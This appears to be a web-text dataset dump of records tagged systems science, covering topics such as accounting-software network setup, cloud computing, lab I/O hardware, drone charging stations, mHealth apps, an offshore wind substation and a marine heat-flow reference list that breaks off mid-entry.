url
stringlengths
15
1.48k
date
timestamp[s]
file_path
stringlengths
125
155
language_score
float64
0.65
1
token_count
int64
75
32.8k
dump
stringclasses
96 values
global_id
stringlengths
41
46
lang
stringclasses
1 value
text
stringlengths
295
153k
domain
stringclasses
67 values
http://xyfon.com/tech-tips/configuring-sage-simply-accounting-windows-server-2008-r2/
2013-05-25T16:03:14
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368705958528/warc/CC-MAIN-20130516120558-00013-ip-10-60-113-184.ec2.internal.warc.gz
0.833592
723
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__162647479
en
Issue: Simply Accounting is installed and able to open the data locally. The Data installed on the server cannot be accessed. When opening the data file on the server, the connection does not get established or there is a network time out. The following steps needs to be performed - Install the Connection Manager by selecting server installation. - The following needs to be installed and bound with the Connection Manager - TCP protocol needs to be installed and bound with the Connection Manager. - IP/Host name resolution issues would result in error while connection or delays opening and closing the data - Try opening the data with the IP address of the server in the Open Company window - DNS must be the same source for the workstations and server - Multihoning is does not work with Connection Manager - Access your Windows Control Panel (through Start, Settings). Click Windows Firewall and click the Exception tab. Make sure SimplyConnectionManger.exe, mysqladmin.exe and mysqld-nt.exe are included in the Exceptions list. - Click the Add Ports tab. Type Simply Accounting Data1 in the Name field and then Type 13540 for the Port number and click OK - Click the Add Ports tab. Type Simply Accounting Data2 in the Name field and then Type 13541 for the Port number. Click OK. You should add at least a port per user. - Repeat the same procedure for any third party firewalls Share folder settings and connection manager - In order to test the rights of the users accessing the data right click on your data folder and choose Sharing and Security from the drop down menu. Select the Share the folder radio button and click Permissions. Choose to share with EVERYONE and give full permissions to the folder. Test accessing the data from the various workstations. If the test is successful you may wish to remove the EVERYONE group from the Permissions tab for security reasons, and add each individual user in the Shared Permissions instead. If the users are not available to add, proceed to step 2. - Use the Computer Server Management to add the LAN users. Open the Control Panel (Windows Start, Settings), Administrative Tools and then Computer Management. Select Local Users and Groups Users and add the user here. Once the user(s) has been added, go back to step 1 and add the individual user to the Shared Permissions on the data folder. - Try again to open the data across the network. If another connection error message is generated proceed to the next step. - Add the local server administrator –not global admin– to users to the Log in for the Connection Manager Service. To do this open the Control Panel, then Administrative Tools, then Services. Find the Simply Accounting Database Connection Manager in the services list and double-click it to open the Properties window. Click the Log On tab. Add the local administrator. Confirm the service state is enabled at this stage and click OK. Open the Simply Accounting Database Connection Manager properties window again. Stop and then Start the Connection Manager service on the server. Try again to open up the database across the network. If unsuccessful proceed to step 6. - Go to Start, Run then Type in secpol.msc. Scroll through the User Rights Assignments and double-click Log on a service. Add the network users to the log on list. Click OK. Start and Stopthe Connection Manager again (Control Panel, Administrative Tools, Services.) Please note this is not the domain permissions but the local permissions for the server.
systems_science
https://bureauserv.com.sg/tag/cloud-computing/
2021-10-26T21:26:21
s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323587926.9/warc/CC-MAIN-20211026200738-20211026230738-00616.warc.gz
0.917591
290
CC-MAIN-2021-43
webtext-fineweb__CC-MAIN-2021-43__0__242279338
en
Tag: Cloud Computing Cloud computing is a type of Internet-based computing that provides shared computer processing resources and data to computers and other devices on demand. It is a model for enabling ubiquitous, on-demand access to a shared pool of configurable computing resources (e.g., computer networks, servers, storage, applications and services), which can be rapidly provisioned and released with minimal management effort. Cloud computing and storage solutions provide users and enterprises with various capabilities to store and process their data in either privately owned, or third-party data centers that may be located far from the user–ranging in distance from across a city to across the world. Cloud computing relies on sharing of resources to achieve coherence and economy of scale, similar to a utility (like the electricity grid) over an electricity network. Advocates claim that cloud computing allows companies to avoid up-front infrastructure costs (e.g., purchasing servers). As well, it enables organizations to focus on their core businesses instead of spending time and money on computer infrastructure. Proponents also claim that cloud computing allows enterprises to get their applications up and running faster, with improved manageability and less maintenance, and enables Information technology (IT) teams to more rapidly adjust resources to meet fluctuating and unpredictable business demand. Cloud providers typically use a “pay as you go” model. This will lead to unexpectedly high charges if administrators do not adapt to the cloud pricing model.
systems_science
https://www.cetoni.com/products/io-module-qmix-io/
2019-01-22T07:46:35
s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583829665.84/warc/CC-MAIN-20190122054634-20190122080634-00335.warc.gz
0.767535
1,219
CC-MAIN-2019-04
webtext-fineweb__CC-MAIN-2019-04__0__157469591
en
Connecting external Devices and Sensors The Qmix I/O module can extend any Qmix system to incorporate a multitude of analog and digital input and outputs, making it possible to easily connect external devices and sensors to an existing Qmix setup. The terminal system of the I/O module lets you connect and remove signal lines very simply and quickly. - 8 digital inputs (e.g. for external trigger signals) - 8 digital outputs (e.g. for switching external devices) - 4 valve outputs to control external digital valves - 6 analog inputs 0…10V (to evaluate external sensor signals) - 2 analog PT100 temperature sensor inputs - 4 analog outputs 0…10V Other products you may find interesting All I/O Channels at a Glance The QmixElements I/O plugin enables fast and easy access to all analog and digital in- and output channels in your Qmix system. You can select the description, scaling, the icon and the unit for each channel. This lets you adapt the display of channels to your application in the optimum way. - Individual description and scaling (factor & offset) for each channel - Real-time recording of sensor data - Script functions for the automation of processes Automating Processes and Actuating External Devices Triggering Events, Converting measurement values, Monitoring measuring ranges… Like all other devices, analog and digital I/O channels are integrated into the QmixElements scripting system through the respective scripting functions. You can load analog sensor values or send analog signals. You can trigger certain processes through external signals or synchronize your process with external devices using trigger signals, thanks to the script system. Do you want to control the flow rate of a pump in real time, using an analog input signal? You can program that too in just a few minutes, through drag&drop. Recording Sensor Values in Real-Time Visualize, Analyze, Optimize… In QmixElements you can record the values of all analog and digital inputs and outputs in the form of curves or CSV-files. This lets you visualize temporal changes of process data or connected sensors (pressure, temperature, etc.) live and in real-time. You can configure the recording through drag & drop and save diagrams in various different formats (PNG, JPG, PDF…). Using CSV-files, recorded measurement values can be analyzed or graphically processed conveniently in Excel or any other analysis program of your choice. Laboratory automation platform The QmixElements software is a comprehensive, plugin-based, modular software solution for the control of all cetoni devices via a common graphical user interface. The software consists of a core that provides the basic features and services, such as the application window, the event log or the tool bar. Qmix SDK Analog I/O Library Windows 32-Bit / 64-Bit DLLs You can read analog inputs of Qmix I/O modules, analog pressure measuring inputs of the Qmix P modules or the analog inputs of neMESYS syringe pumps with one uniform interface used across all devices – the analog I/O library. All functions are supplied through a Windows DLL (32-bit / 64-bit), enabling simple and inexpensive integration into any 32 or 64-bit Windows development environment supporting the use of DLLs. Some of the things you can do: - Write analog outputs - Read analog inputs - Configure the software scaling of measuring parameters Qmix SDK Analog I/O LabVIEW Kit Full LabVIEW Integration The LabVIEW kit lets you integrate the Qmix SDK analog I/O library into your LabVIEW environment with minimal effort. You will be provided with a selection of finished VIs to access analog inputs and outputs of Qmix modules. Qmix SDK Digital I/O Library Windows 32-Bit / 64-Bit DLLs If you want to work with digital input and outputs, the digital I/O library is the perfect solution for you. It lets you access digital I/Os of Qmix I/O modules or digital inputs of neMESYS dosing modules as well as neMAXYS axis systems, for example. All functions are provided through a Windows DLL (32-bit / 64-bit), enabling simple and inexpensive integration into any 32- or 64-bit development environment supporting the use of DLLs. You will receive functions for: - Reading digital inputs - Setting digital outputs Qmix SDK Digital I/O LabVIEW Kit Full LabVIEW Integration The Qmix SDK digital I/O LabVIEW kit is a full LabVIEW library, including all VIs for accessing digital inputs and outputs of neMESYS and Qmix modules. In combination with the other Qmix SDK LabVIEW libraries, you can truly integrate all cetoni devices into your LabVIEW applications. Qmix Software Development Kit (SDK) For integration of cetoni devices into custom applications The Qmix SDK is a powerful software package that allows developers to integrate their Qmix system and its various modules into their applications. Central to the Qmix SDK are device-specific libraries that provide the programming interface (APIs) for each Qmix module (neMESYS pumps, rotAXYS and neMAXYS positioning systems, Qmix IO, etc.). |Dimensions (L x W x H)||310 x 72 x 112 mm| |Supply Voltage||24 V DC| |Power Consumption||Load-dependent (max. 120W)| |Operating Temperature||0 - 50 °C| |Storage Temperature||-20 - 75 °C| |Operating Humidity||20% bis 90%, non-condensing| |Storage Humidity||20% bis 90%, non-condensing| |PT-100 Temperature Inputs||2|
systems_science
https://atl.recruit-tech.co.jp/berlin_tokyo/results/phase_01/
2019-09-20T05:31:32
s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573832.23/warc/CC-MAIN-20190920050858-20190920072858-00294.warc.gz
0.912145
507
CC-MAIN-2019-39
webtext-fineweb__CC-MAIN-2019-39__0__130753123
en
A Charging Station for Quadrocopters Development of an IoT device for businesses utilizing quadrocopters PROJECT PERIOD: 2.5 months We have developed a charging station for quadrocopters. By installing stations on rooftops which quadrocopters can use to charge their batteries if they run low during flight, we will alleviate the problem which was becoming a bottleneck regarding batteries. The primary focus of this phase was developing the roof for the charging station. About the Technology Used Real-time notifications of quadrocopter approach and streaming function By using a small Linux board (RaspberryPi), it is possible to utilize the many software assets accumulated in Linux developmentand achieve not only down-sizing and energy-saving, but also network connection, email transmission, streaming of images captured by a web camera and so on. The approach of quadrocopters is detected through motion detection of the camera equipped on the charging station and email notification is sent. Streaming from the web camera enables control while confirming the state of the quadrocopter. A retractable roof able to be operated remotely We have developed a retractable roof which can be operated remotely from PCs or smartphones. After several prototype builds, we adopted a “stroller model” (like the hood of a baby’s pram). The command for the roof to open or close is sent from the device via the internet by Raspberry Pi to Arduino, causing the motor to move. The opening and closing speed and fully-open, half-open are adjustable. A control function compatible with any device Using Node.js’s Socket. IO, we have enabled real-time control through socket communication which can maintain connection between the server and client. Moreover, special-purpose applications are not required, with all control being possible through a browser. This means that any device, whether it be PC, smartphone or something else, can be used to control the charger from anywhere in the world. The tentative sale of a roof-less version of this charger began from this January. (http://skysense.de/). Currently, the development is ongoing, with a focus on higher performance of the charging system (universalization, more supporting products) and roof implementation. We are also searching for and investigating material with high water-resistance for the roof. In the future, we plan to start working on the development of automatic landing, etc.
systems_science
http://newworksummit.com/conferences/new-work-summit-2017/speakers/dr-astro-teller
2017-07-23T06:33:39
s3://commoncrawl/crawl-data/CC-MAIN-2017-30/segments/1500549424287.86/warc/CC-MAIN-20170723062646-20170723082646-00435.warc.gz
0.969291
279
CC-MAIN-2017-30
webtext-fineweb__CC-MAIN-2017-30__0__196020231
en
Dr. Astro Teller currently oversees X, Alphabet's moonshot factory for building magical, audaciously impactful ideas that through science and technology can be brought to reality. Before joining Google/Alphabet, Teller was the co-founding C.E.O. of Cerebellum Capital, Inc., an investment management firm whose investments are continuously designed, executed and improved by a software system based on techniques from statistical machine learning. Teller was also the co-founding C.E.O. of BodyMedia, Inc., a leading wearable body-monitoring systems company. Prior to starting BodyMedia, Teller was co-founding C.E.O. of SANDbOX AD, an advanced development technology incubator. Before his tenure as a business executive, Teller taught at Stanford University and was an engineer and researcher for Phoenix Laser Technologies, Stanford’s Center for Integrated Systems, and The Carnegie Group Incorporated. Teller holds a Bachelor of Science in computer science from Stanford University, Master of Science in symbolic and heuristic computation, also from Stanford University, and a Ph.D. in artificial intelligence from Carnegie Mellon University. Through his work as a scientist, inventor and entrepreneur, Teller holds many U.S. and international patents related to his work in hardware and software technology. Teller is also a successful novelist and screenwriter.
systems_science
https://www.talentgear.com/learn/march-2019/assessments-it/?feed=articles
2020-03-30T09:58:35
s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370496901.28/warc/CC-MAIN-20200330085157-20200330115157-00555.warc.gz
0.83148
98
CC-MAIN-2020-16
webtext-fineweb__CC-MAIN-2020-16__0__108679939
en
M-F 9AM-5PM CST By Kristeen Bullwinkle & The Talent Gear Team | February 27, 2019 Research, design, develop, and test operating systems-level software, compilers, and network distribution software for medical, industrial, military, communications, aerospace, business, scientific, and general computing applications. Set operational specifications and formulate and analyze software requirements. May design embedded systems software. Apply principles and techniques of computer science, engineering, and mathematical analysis.
systems_science
https://www.starcourier.com/story/news/2021/02/08/people-crash-site-trying-get-vaccinations-henry-stark-counties/4439480001/
2021-09-20T16:42:15
s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057083.64/warc/CC-MAIN-20210920161518-20210920191518-00636.warc.gz
0.977091
528
CC-MAIN-2021-39
webtext-fineweb__CC-MAIN-2021-39__0__195911619
en
People crash site trying to schedule vaccinations in Henry/Stark counties KEWANEE — Some area residents were able to register Monday for the Henry Stark County Health Department’s second drive-thru vaccine clinic before the server came crashing down, health officials confirmed. Over 600 COVID-19 vaccine doses were available on a first-come, first-served basis, but the increase in traffic caused the website’s server to crash, leaving many residents out in the cold. Site users were given a message that stated “temporary back-end unavailable. We are currently experiencing abnormally high traffic volume between our front-end and back-end servers, and working to restore all services as quickly as possible. Thank you for your patience.” An IT professional, speaking confidentially, told the Star Courier that the situation wasn’t surprising. “The server could not handle the load and crashed the system,” the source said. For the kind of increased traffic required to meet the demands of thousands of people vying for a few slots, the infrastructure would need to be beefed up, he said, comparing the situation to a traffic jam. “Think of it as everyone leaving their house in their car at the same time. The roads would be jam packed, no one could get anywhere,” he said. “That’s equivalent to what they are doing on the technology side,” he said, adding that the situation was likely frustrating to people. The next drive-thru clinic is scheduled for Feb. 19 at Black Hawk College, East Campus, but according to early reports by health officials not all of the time slots were filled before the server failed. On the HSCHD Facebook page, however, a post was made shortly after the registration link went live, announcing that the time slots were filled. Facebook users expressed their frustration with the system. One Facebook user wrote that she had tried to get her elderly father a time slot, but due to the high volume she couldn’t get in. Another Facebook user said that he got up early to secure a time, but within two minutes, the system had crashed. After the last registration, Rae Ann Tucker, director of health promotions for the county health department, said that while the system wasn’t perfect, over 1,200 people were able to register for the first clinic. On Monday, Tucker acknowledged that the server did crash, and around 11 a.m. the health department announced it would be opening registration back up on Monday afternoon.
systems_science
https://help.bibook.com/support/solutions/articles/80000734713-report-loading-time
2023-06-07T15:28:33
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224653930.47/warc/CC-MAIN-20230607143116-20230607173116-00501.warc.gz
0.969256
185
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__53715426
en
Power BI loads the report and makes the calculations for it in real time, which is both one of its greatest strengths and weaknesses. By doing so it makes sure the report is based on the most up date data but it also leads to Power BI having to make an extra effort to load the report and therefore increase the time the machine needs to load. The loading time is affected by - the speed of your own internet - the amount of RAM your browser is using (easiest way to reduce is by closing unused tabs) - the complexity of the model (the P&L and balance sheet pages usually are quite complex and need a bit more time to load) - the amount of data (can be reduced by aggregating data) - how many users are currently using BI Book. You can contact us at [email protected] if the loading time is prohibitively long.
systems_science
https://barlaz.wordpress.ncsu.edu/teaching/
2023-12-01T09:22:05
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100286.10/warc/CC-MAIN-20231201084429-20231201114429-00587.warc.gz
0.913536
196
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__157754422
en
Solid waste management is an integral component of civil infrastructure that must be addressed by virtually every municipality. Solid waste management is a highly visible and high-impact target for enhancing environmental sustainability. Appropriate selection of waste processing technologies and efficient waste management strategies can cost-effectively minimize environmental impacts, particularly through energy generation and materials recovery. Specific issues include cost, waste diversion programs, regulatory compliance, energy recovery, landfill capacity, and public opinion. This course will cover all aspects of municipal solid waste management including refuse generation, source reduction, collection, transport, recycling and resource recovery, burial in landfills, biological treatment, and combustion. The environmental and economic advantages and disadvantages of each process will be discussed. Regulations and policy relevant to municipal solid waste will also be presented and analyzed. Students are expected to integrate economic, environmental, regulatory, policy, and technical considerations into the development of engineering designs of solid waste processes and systems. The course will emphasize both engineering design and policy alternatives.
systems_science
https://slowdnn-workshop.github.io/tutorials/
2023-02-05T11:06:12
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500251.38/warc/CC-MAIN-20230205094841-20230205124841-00421.warc.gz
0.902733
1,291
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__81042442
en
The first day of the workshop features tutorial presentations from a subset of the organizers. These tutorials present an up-to-date account of the intersection between low-dimensional modeling and deep learning in an accessible format. The first session will introduce fundamental properties and theoretical results for sensing, processing, analyzing, and learning low-dimensional structures from high-dimensional data. We will first discuss classical low-dimensional models, such as sparse recovery and low-rank matrix sensing, and motivate these models by applications in medical imaging, collaborative filtering, face recognition, and beyond. Based on convex relaxation, we will characterize the conditions, in terms of sample/data complexity, under which the inverse problems of recovering such low-dimensional structures become tractable and can be solved efficiently, with guaranteed correctness or accuracy. We will transit from sensing to learning low-dimensional structures, such as dictionary learning, sparse blind deconvolution, and dual principal component analysis. Problems associated with learning low-dimensional models from sample data are often nonconvex: either they do not have tractable convex relaxations or the nonconvex formulation is preferred due to physical or computational constraints (such as limited memory). To deal with these challenges, we will introduce a systematic approach of analyzing the corresponding nonconvex landscapes from a geometry and symmetry perspective. The resulting approach leads to provable globally convergent nonconvex optimization methods. We will discuss the contemporary topic of using deep models for computing with nonlinear data, introducing strong conceptual connections between low-dimensional structures in data and deep models. We will then consider a mathematical model problem that attempts to capture these aspects of practice, and show how low-dimensional structure in data and tasks influences the resources (statistical, architectural) required to achieve a given performance level. Our discussion will revolve around basic tradeoffs between these resources and theoretical guarantees of performance. Ohio State University Continuing our exploration of deep models for nonlinear data, we will begin to delve into learned representations, network architectures, regularizations, and beyond. We will see how the tools for nonconvexity developed previously shed light on the learned representations produced by deep networks, through connections to matrix factorization. We will observe how algorithms that interact with data will expose additional connections to low-dimensional models, through implicit regularization of the network parameters. Based upon the previous discussion on the connection between low-dimensional structures and deep models, in this section, we will discuss principles for designing deep networks through the lens of learning good low-dimensional representation for (potentially nonlinear) low-dimensional structures. We will see how unrolling iterative optimization algorithms for low-dimensional problems (such as the sparsifying algorithms) naturally lead to deep neural networks. We will then show how modern deep layered architectures, linear (convolution) operators, and nonlinear activations, and even all parameters can be derived from the principle of learning a compact linear discriminative representation for nonlinear low-dimensional structures within the data. We will show how so learned representations can bring tremendous benefits in tasks such as learning generative models, noise stability, and incremental learning. We discuss the role of sparsity in general neural network architectures, and shed light on how sparsity interacts with deep learning under the overparameterization regime, for both practitioners and theorists. A sparse neural network (NN) has most of its parameters set to zero and is traditionally considered as the product of NN compression (i.e., pruning). Yet recently, sparsity has exposed itself as an important bridge for modeling the underlying low dimensionality of NNs, for understanding their generalization, optimization dynamics, implicit regularization, expressivity, and robustness. Deep NNs learned with sparsity-aware priors have also demonstrated significantly improved performances through a full stack of applied work on algorithms, systems, and hardware. In this talk, I plan to cover recent progress on the practical, theoretical, and scientific aspects of sparse NNs. I will try scratching the surface of three aspects – (1) practically, why one should love a sparse NN, beyond just a post-training NN compression tool; (2) theoretically, what are some guarantees that one can expect from sparse NNs; and (3) what is future prospect of exploiting sparsity in NNs. Michigan State University In this talk, we present our work on improving machine learning for image reconstruction on three fronts – i) learning regularizers, ii) learning with no training data, and iii) ensuring robustness to perturbations in learning-based schemes. First, we present an approach for supervised learning of sparsity-promoting regularizers, where the parameters of the regularizer are learned to minimize reconstruction error on a paired training set. Training involves a challenging bilevel optimization problem with a nonsmooth lower-level objective. We derive an expression for the gradient of the training loss using the implicit closed-form solution of the lower-level variational problem, and provide an accompanying exact gradient descent algorithm (dubbed BLORC). Our experiments show that the gradient computation is efficient and BLORC learns meaningful operators for effective denoising. Second, we investigate the deep image prior (DIP) scheme that recovers an image by fitting an overparameterized neural network directly to the image’s corrupted measurements. To address DIP’s overfitting and performance issues, recent work proposed using a reference image as the network input. However, obtaining the reference often requires supervision. Hence, we propose a self-guided scheme that uses only undersampled measurements to estimate both the network weights and input image. We exploit regularization requiring the network to be a powerful denoiser. Our self-guided method gives significantly improved reconstructions for MRI with limited measurements compared to recent schemes, while using no training data. Finally, recent studies have shown that trained deep reconstruction models could be over-sensitive to tiny input perturbations, which cause unstable, low-quality reconstructed images. To address this issue, we propose Smoothed Unrolling (SMUG), which incorporates a randomized smoothing-based robust learning operation into a deep unrolling architecture and improves the robustness of MRI reconstruction with respect to diverse perturbations.
systems_science
https://innovativentgov.com/?capabilities
2020-10-21T07:21:45
s3://commoncrawl/crawl-data/CC-MAIN-2020-45/segments/1603107876136.24/warc/CC-MAIN-20201021064154-20201021094154-00044.warc.gz
0.894069
188
CC-MAIN-2020-45
webtext-fineweb__CC-MAIN-2020-45__0__17920224
en
Innovative Networking Technology, Inc. operates with full trust, respect and collaboration with our clients. We enable our multiple-disciplined Subject Matter Experts using our service optimization pod methodology to deliver cybersecurity, management consulting, systems engineering & architecture services, cloud/mobile optimization strategy and health IT services to our clients. Our depth of knowledge creates opportunities for our clients to achieve their goals and accomplish their objectives on time and within budget. - Management Consulting - Systems Engineering & Architecture - Cloud Security Architecture Strategy - Healthcare IT At Innovative Networking Technology, Inc. we work to make technology simpler and manageable. Instead of having to work with multiple vendors to fulfill your needs, you can rely on Innovative Networking Technology, Inc. to work with vendors on your behalf, to evaluate, acquire, deploy and support the different aspects of your IT infrastructure. Our recommendations will be well-informed, trustworthy, and unbiased.
systems_science
https://easyarticleshub.com/article.php?post=the-evolution-of-custom-mhealth-apps-trends-and-innovations
2024-04-22T15:35:44
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296818312.80/warc/CC-MAIN-20240422144517-20240422174517-00504.warc.gz
0.91512
910
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__99550629
en
In recent years, the healthcare industry has witnessed a significant transformation with the advent of mobile health (mHealth) applications. These innovative tools have revolutionized the way patients interact with healthcare services, providing convenient access to information, monitoring, and communication. In particular, custom mHealth app development has emerged as a key area of focus, allowing healthcare organizations to tailor solutions to their specific needs and requirements. In this article, we will explore the evolution of custom mHealth apps, highlighting the latest trends and innovations shaping the industry. The Rise of Custom mHealth App Development: Custom mHealth app development has gained momentum as healthcare providers recognize the importance of personalized solutions in improving patient care and engagement. Unlike off-the-shelf applications, custom mHealth apps are designed to meet the unique needs of healthcare organizations, incorporating features and functionalities tailored to their workflows and patient populations. This approach allows for greater flexibility, scalability, and innovation, enabling healthcare providers to deliver more efficient and effective care. Key Trends in Custom mHealth App Development: Patient-Centric Design: One of the most significant trends in custom mHealth app development is the focus on patient-centric design. Developers are prioritizing user experience and usability, ensuring that apps are intuitive, accessible, and engaging for patients of all ages and backgrounds. Features such as personalized dashboards, interactive tools, and educational content are being integrated to empower patients to take control of their health and well-being. Integration of Wearable Devices: With the growing popularity of wearable devices such as smartwatches and fitness trackers, custom mHealth apps are increasingly integrating with these technologies to collect real-time health data. By leveraging data from wearables, healthcare providers can gain valuable insights into patients' activity levels, vital signs, and overall health status, enabling more proactive and personalized care interventions. Telemedicine and Remote Monitoring: The COVID-19 pandemic has accelerated the adoption of telemedicine and remote monitoring solutions, driving demand for custom mHealth apps that facilitate virtual consultations and remote patient monitoring. These apps enable healthcare providers to deliver care remotely, reducing the need for in-person visits and improving access to healthcare services, particularly in underserved communities. AI-Powered Analytics: Artificial intelligence (AI) and machine learning (ML) technologies are increasingly being integrated into custom mHealth apps to analyze vast amounts of health data and generate actionable insights. AI-powered analytics can help healthcare providers identify trends, predict health outcomes, and personalize treatment plans, leading to more effective and efficient care delivery. Data Security and Compliance: With the growing concerns around data privacy and security, custom mHealth app developers are placing a greater emphasis on implementing robust security measures and ensuring compliance with regulations such as the Health Insurance Portability and Accountability Act (HIPAA). Encryption, authentication, and access control mechanisms are being deployed to safeguard sensitive patient information and maintain trust in the healthcare ecosystem. Innovations Driving Custom mHealth App Development: Personalized Health Coaching: Custom mHealth apps are incorporating personalized health coaching features, allowing users to receive tailored guidance and support based on their individual health goals and preferences. These apps leverage AI algorithms to analyze users' health data and provide personalized recommendations for diet, exercise, medication adherence, and lifestyle modifications. Virtual Reality (VR) and Augmented Reality (AR): VR and AR technologies are being integrated into custom mHealth apps to enhance patient education, rehabilitation, and therapy experiences. For example, VR simulations can be used to educate patients about medical procedures, while AR overlays can provide real-time guidance during physical therapy sessions, improving patient outcomes and engagement. Blockchain-Based Health Records: Blockchain technology is gaining traction in the healthcare industry for its potential to secure and streamline health data exchange. Custom mHealth apps are exploring blockchain-based solutions for managing electronic health records (EHRs), enabling patients to securely access and share their medical information with healthcare providers, researchers, and other stakeholders. Custom mHealth app development is driving innovation in the healthcare industry, empowering healthcare providers to deliver more personalized, accessible, and efficient care. By leveraging the latest trends and innovations, custom mHealth apps are revolutionizing patient engagement, remote monitoring, and treatment delivery, ultimately leading to improved health outcomes and enhanced patient satisfaction. As technology continues to evolve, we can expect custom mHealth apps to play an increasingly integral role in shaping the future of healthcare delivery.
systems_science
https://www.tritonknoll.co.uk/triton-knoll-onshore-substation-tour/
2022-08-13T16:12:55
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571959.66/warc/CC-MAIN-20220813142020-20220813172020-00123.warc.gz
0.928217
311
CC-MAIN-2022-33
webtext-fineweb__CC-MAIN-2022-33__0__111971277
en
The Triton Knoll Onshore Substation is complex infrastructure with a very important role to play in ensuring the power generated from the offshore wind farm can be transferred into the national grid and, ultimately, into your homes. Power is generated by the offshore wind turbines and then makes a 110km journey from the offshore site to the onshore substation via export cables. Once at the onshore substation, the electricity is converted into the correct voltage to allow it to be fed into the national grid. There are many different components within the onshore substation each playing a key role in ensuring the power is properly converted but did you know the onshore substation also has a big role to play in the operation and maintenance of the wind farm too? In the video below, our Substations Package Manager, Jacob Hain, takes you on a tour of the Triton Knoll Onshore Substation introducing the key components and detailing their purpose in transporting electricity but also ensuring that we can properly operate the offshore wind turbines. Super Grid Transformer: You may have seen our footage showing the delivery of the Super Grid Transformers to our site, but why are these one of the most important components at the onshore substation? Control Building: Did you know that equipment housed at the onshore substation allows us to monitor the wind turbines located 20 miles offshore from our operations base in Grimsby? Landscaping: How do we ensure that the onshore substation is properly screened and how can the screening encourage wildlife?
systems_science
http://cybersolutionstek.com/
2017-04-25T06:30:49
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917120187.95/warc/CC-MAIN-20170423031200-00454-ip-10-145-167-34.ec2.internal.warc.gz
0.87677
193
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__279275636
en
CST is a company dedicated to business consulting and development of product solutions with a focus on mobile cybersecurity for you and your company. Our patented cybersecurity software authentication products and methods (U.S. Patent No. 8,930,700) enable employees to safely carry their own files and personal medical, financial, legal, identity and education records on their devices while traveling. Emergency personnel can also instantly access the information required to provide care potentially saving your life, corporate data, bank account or identity. The CST product family of RecordVault™ apps allows you to store and retrieve your electronic files and records with our patented RecordSecurity³™ technology incorporating affordable software-based multifactor authentication (3FA). Our business solutions integrate the RecordVault app or technology for Android Phones and Tablets, iPhone, iPad, Windows Phone and Windows Tablet products with your system software plus connectivity to Microsoft HealthVault, iCloud, Dropbox, or other cloud services.
systems_science
https://marine-heatflow.ceoas.oregonstate.edu/references/
2023-10-01T18:40:30
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510924.74/warc/CC-MAIN-20231001173415-20231001203415-00681.warc.gz
0.71749
1,243
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__128739131
en
References and Downloadable Papers and Documentation Davies, F. G. (1980), Review of oceanic and global heat flow estimates, Rev. Geophys. Space Phys., 18, 718-722. Davis, E. E., and C. R. B. Lister (1974), Fundamentals of ridge crest topography, Earth Planet. Sci. Lett., 21, 405-413. Harris, R. N., and D. S. Chapman (2004), Deep-seated oceanic heat flow, heat deficits, and hydrothermal circulation, in Hydrogeology of the Oceanic Lithosphere, edited by E. E. Davis and H. Elderfield, pp. 311-336, Cambridge University Press, Cambridge, UK. Harris, R. N., et al. (2007), The future of marine heat flow: defining scientific goals and experimental needs for the 21st century, 45 pp, Fort Douglas, Salt Lake City. Parsons, B., and J. G. Sclater (1977), An analysis of the variation of ocean floor bathymetry and heat flow with age, J. Geophys. Res., 82, 803-829. Pollack, H. N., S. J. Hurter, and J. R. Johnson (1993), An analysis of the variation of ocean floor bathymetry and heat flow with age, Rev. Geophys., 31(3), 267-280. Sclater, J. G., C. Jaupart, and D. Galson (1980), The heat flow through oceanic and continental crust and the heat loss of the Earth, Rev. Geophys. Space Phys., 18, 269-311. Stein, C., and S. Stein (1994), The heat flow through oceanic and continental crust and the heat loss of the Earth, J. Geophys. Res., 99, 3081-3095. Stein, C. A., S. Stein, and A. M. Pelayo (1995), The heat flow through oceanic and continental crust and the heat loss of the Earth, in Seafloor Hydrothermal Systems: Physical, Chemical, Biological and Geological Interactions, edited by S. E. Humphris, et al., pp. 425-445, American Geophysical Union, Washington, D. C. Stein, C. A., and R. P. Von Herzen (2001), The heat flow through oceanic and continental crust and the heat loss of the Earth, in Encyclopedia of Ocean Sciences, eds. Steele, J., Thorpe, S., and K. Turekian, Academic Press LTD, London, 1149-1157. Von Herzen, R. P. (2004), Geothermal evidence for continuing hydrothermal circulation in older (>60 Ma) ocean crust, in Hydrogeology of the Oceanic Lithosphere, edited by E. E. Davis and H. Elderfield, pp. 414-450, Cambridge University Press, Cambridge, UK. Davis, E. E. (1988), Oceanic heat-flow density, in Handbook of terrestrial heat-flow density determination, edited by R. Haenel, et al., pp. 223-260, Kluwer, Amsterdam. Hartmann, A., and H. Villinger (2002), Inversion of marine heat flow measurements by expansion of the temperature decay function, Geophys. J. Int., 148(3), 628-636. Hutchinson, I. (1985), The effects of sedimentation and compaction on oceanic heat flow, Geophys. J. R. astr. Soc., 82, 439-459. Hutnak, M., and A. T. Fisher (2007), The influence of sedimentation, local and regional hydrothermal circulation, and thermal rebound on measurements of heat flux from young seafloor, J. Geophys. Res., 112, B12101, doi:10.1029/2007JB005022. Hyndman, R. D., et al. (1979), The measurement of marine geothermal heat flow by a multipenetration probe with digital acoustic telemetry and in situ conductivity, Mar. Geophys. Res., 4, 181-205. Langseth, M. G. (1965), Techniques of measuring heat flow through the ocean floor, in Terrestrial Heat Flow, edited by W. H. K. Lee, pp. 58-77, Am. Geophys. Union, Washington, DC. Lister, C. R. B. (1979), The pulse-probe method of conductivity measurement, Geophys. J. R. 